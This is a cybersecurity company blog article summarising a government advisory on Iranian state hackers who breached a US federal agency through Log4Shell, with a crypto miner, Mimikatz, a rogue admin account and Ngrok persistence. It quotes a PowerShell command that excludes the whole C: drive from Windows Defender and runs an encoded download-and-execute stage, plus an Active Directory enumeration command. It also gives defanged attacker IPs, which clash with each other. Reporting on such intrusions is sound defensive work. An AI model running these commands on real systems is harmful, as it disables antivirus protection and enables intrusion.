Free Consult

Iranian APT Uses Log4j Vulnerability
To Hack US Federal Network

Contents

Summary Of The Attack

  • In December of last year, US federal agencies were the subject of hacking assaults, and companies were harmed.
  • The Department of the Treasury, the Department of Commerce, and the US Department of Homeland Security were all affected.
  • This time, according to the FBI and CISA, Iranian government-sponsored hackers accessed an undisclosed US federal agency’s network early this year, using the Log4Shell vulnerability to deploy crypto miners and compromised credentials.
  • Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, advanced to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.
  • The assault highlights the pervasiveness of the Log4j vulnerability, which made worldwide headlines a year ago and remains a live danger for many businesses.
.

What Happened?

According to the FBI and CISA, Iranian government-sponsored hackers accessed an undisclosed US federal agency’s network early this year, using the Log4Shell vulnerability to deploy crypto miners and compromised credentials.

In a more detailed statement, they say that the hackers broke into an unpatched VMware Horizon server in February 2022, with US security officials responding to the attack in June to clean up the network.

How The Attack Happened

“Cyber threat actors exploited the Log4Shell vulnerability in an unpatched VMware Horizon server, installed XMRig crypto mining software, advanced to the domain controller (DC), compromised credentials, and then implanted Ngrok reverse proxies on several hosts to maintain persistence,” according to the advisory.

The Attack Path

he attack path used to breach US federal networks.

After this VMware Horizon server was detected, the threat actors utilized the following malicious IP address to create a connection: 82.54.217[.] 2

The actors included an exclusion rule for Windows Defender in the exploit payloads, which was activated by the following PowerShell command:

powershell try{Add-MpPreference -ExclusionPath ‘C:\’; Write-Host ‘added-exclusion’} catch {Write-Host ‘adding-exclusion-failed’ }; powershell -enc “$BASE64 encoded payload to download next stage and execute it”

This exclusion rule permitted the inclusion of the full drive c:/ on the exclusion list. Using this strategy, threat actors can download tools to the c:/drive without being identified by virus scans.

Following the download, a file.zip is extracted from 182.54.217[.]2, and the mde.ps1 is deleted from the disk.

That file was discovered by researchers. When the researchers probed deep into the zip file, they discovered crypto-mining software. The following utilities were also downloaded in a volume of roughly 30 megabytes from a site called transfer[.]sh.

We have listed the tools that threat actors have downloaded below:

  • PsExec: A Microsoft signed tool for system administrators.
  • Mimikatz: A credential theft tool.
  • Ngrok: A reverse proxy tool for proxying an internal service out onto a Ngrok domain.

Following the execution of Mimikatz on VDI-KMS, a rogue domain administrator account was established using the credentials obtained.

The actors utilized RDP to disseminate the newly established account to a number of machines on the network.

Threat actors have to conduct the following PowerShell command on Active Directory in order to get a footing in the network:

Powershell.exe get-adcomputer -filter * -properties * | select name,operatingsystem,ipv4address >

While the primary goal is to eventually get access to the domain controller, threat actors have modified the local administrator password as a backup in case the rogue domain admin access is identified and revoked.

Free IT Security Policies

Get a step ahead of your goals with our comprehensive templates.

Download Now
IT Security Policy Templates

Log4j Vulnerability Still Persists

The assault highlights the pervasiveness of the Log4j vulnerability, which made worldwide headlines a year ago and remains a live danger for many businesses, with CISA warning late last year that the issue might potentially infect hundreds of millions of devices.

“Log4j is particularly difficult to identify and patch as it may be bundled as a deep dependency in software bought and operated by companies without the resources to find and patch such a vulnerability,” Jamie Boote, software security consultant at Synopsys Software Integrity Group, told SC Media.

However, as part of an emergency Binding Operational Directive issued by CISA to civilian government agencies last year, federal agencies were meant to inventory all of their software assets against a CISA-managed GitHub repository of software believed to be impacted by the problem and prioritize patching.

It was eventually included to the agency’s Known Exploited Vulnerabilities database, which is a constantly updated list of vulnerabilities that civilian government agencies must detect and patch within two weeks

“We have alerted people affected and are revealing more here because we take our commitment to security, privacy, and openness seriously,” and they have also claimed that “We also investigated our logs, and found no indication of successful misuse.”

Wrapping Up

The bottom line is that we still have plenty of devices across the internet vulnerable to Log4j.

We are also aware that there are organizations that still do not understand the seriousness of such problems and vulnerabilities.

Organizations must continually focus on identifying and mitigating vulnerabilities inside their business in order to have the best possible protection.

Article by

Picture of Jason Firch, MBA
Jason Firch, MBA
Jason is a proven marketing leader, veteran IT operations manager, and cybersecurity expert with over a decade of experience. He is the founder and CEO of PurpleSec.
Linkedin
Picture of Jason Firch, MBA
Jason Firch, MBA
Jason is a proven marketing leader, veteran IT operations manager, and cybersecurity expert with over a decade of experience. He is the founder and CEO of PurpleSec.

Share This Article

Our Editorial Process

Our content goes through a rigorous approval process which is reviewed by cybersecurity experts – ensuring the quality and accuracy of information published.

Categories

AI Security

Cybersecurity Strategy

General Cybersecurity

Network Security

Penetration Testing

Ransomware

Recent Cyber Attacks

Small Business

Social Engineering

Vulnerability Management

$50/mo per device

Managed XDR Built For Small Business

Subscribe to easy cybersecurity and save thousands with a cloud-native managed detection and automated response solution.

Learn More

Related Breaches

PurpleSec

Get Secure Today.

Founded in 2019, PurpleSec is a veteran-owned cybersecurity company with a mission to help SMBs and startups affordably meet their security requirements.

Explore The Savings

Our Solutions

Virtual CISO

Defiance XDR

Social Engineering

Vulnerability Mgmt

Penetration Testing

Contact Us

Why PurpleSec?

About Us

Case Studies

How We Work

Our Leadership

Our Mission & Values

Linkedin Youtube Twitter

Learn With PurpleSec

Blog

Podcasts

Recent Cyber Attacks

Cybersecurity Insights

View All Resources